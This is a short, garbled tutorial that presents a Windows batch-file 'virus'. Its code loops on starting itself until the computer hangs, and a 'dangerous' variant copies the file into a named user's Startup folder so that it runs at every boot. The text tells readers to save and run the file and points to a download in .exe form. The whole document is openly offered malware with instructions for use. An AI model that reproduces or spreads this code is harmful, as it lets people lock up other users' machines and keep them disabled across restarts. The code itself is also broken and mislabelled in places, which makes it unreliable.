this virus is working in windows os
this virus make hang your computer.
its start automatical cmd command softwear
after it make computer hang
you are hacked
start e.bat
goto loop
you are hacked
start e.bat
goto loop
copy the above code in a notepad and save it in yourfilename.bat
the yourfilename.bat file is a virus when you click that yourfilename.bat your computer will hang down
convert this virus in to dangerous
start e.bat
goto loop
xcopy yourfilename.bat "C:\Users\alvin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
start e.bat
goto loop
xcopy yourfilename.bat "C:\Users\alvin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy the above code in a notepad and save it in yourfilename.bat
the yourfilename.bat file is a virus when you click that yourfilename.bat your computer will hang down in every time your computer start
click this link to download this virus in .exe format
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